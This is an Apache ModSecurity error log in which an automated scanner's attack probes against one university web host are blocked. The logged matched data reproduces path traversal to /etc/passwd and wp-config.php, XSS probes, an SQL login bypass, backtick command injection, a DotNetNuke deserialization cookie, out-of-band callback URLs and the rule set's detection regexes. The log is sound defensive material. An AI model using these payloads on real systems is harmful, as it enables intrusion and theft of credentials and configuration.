[Tue Aug 29 11:42:25.372565 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAdSZLoAAAAX"]
[Tue Aug 29 11:42:26.380195 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdi9@8AAAAk"]
[Tue Aug 29 11:42:27.383717 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdZZrIAAAAf"]
[Tue Aug 29 11:42:27.397391 2023] [:error] [pid 1900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdsFg4AAAAo"]
[Tue Aug 29 11:42:28.428573 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdSZMEAAAAX"]
[Tue Aug 29 11:42:29.435083 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAd5nrAAAAAm"]
[Tue Aug 29 11:42:32.439474 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g56mhs4h7rf1h9.oast.site found within TX:1: cjmnbitjmimt14dgn26g56mhs4h7rf1h9.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAdlvbMAAAAl"]
[Tue Aug 29 11:42:32.439790 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "mbkm.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAd5nrcAAAAm"]
[Tue Aug 29 11:42:34.380672 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAdeQ10AAAAQ"]
[Tue Aug 29 11:42:34.426852 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAdKXP0AAAAK"]
[Tue Aug 29 11:42:40.417084 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAc92zEAAAAD"]
[Tue Aug 29 11:42:40.490429 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAQSW2AAAAA0"]
[Tue Aug 29 11:42:41.481415 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAeX1AwAAAAK"]
[Tue Aug 29 11:42:42.376365 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAdeQ28AAAAQ"]
[Tue Aug 29 11:42:43.417062 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAQSW2YAAAA0"]
[Tue Aug 29 11:42:46.507588 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAdV7dcAAAAa"]
[Tue Aug 29 11:42:46.566815 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAdftTkAAAAG"]
[Tue Aug 29 11:42:47.384592 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAARpg2QAAAAU"]
[Tue Aug 29 11:42:48.382167 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAdb7mIAAAAb"]
[Tue Aug 29 11:42:48.396732 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAeB1o4AAAAv"]
[Tue Aug 29 11:42:48.511092 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26gr3cz1r3hudzno.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAdb7mQAAAAb"]
[Tue Aug 29 11:42:48.538620 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13SMCo-f0AAAeYbyYAAAAB"]
[Tue Aug 29 11:42:50.408744 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAdXIoMAAAAd"]
[Tue Aug 29 11:42:51.372538 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAenGYEAAAAM"]
[Tue Aug 29 11:42:51.375606 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAd64RkAAAAp"]
[Tue Aug 29 11:42:52.374831 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAd9UNMAAAAr"]
[Tue Aug 29 11:42:53.368946 2023] [:error] [pid 1914] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAd64R4AAAAp"]
[Tue Aug 29 11:42:53.379138 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAARpg28AAAAU"]
[Tue Aug 29 11:42:54.385357 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAXNuXoAAAAg"]
[Tue Aug 29 11:42:54.532803 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAd4azQAAAAj"]
[Tue Aug 29 11:42:57.450338 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAc920wAAAAD"]
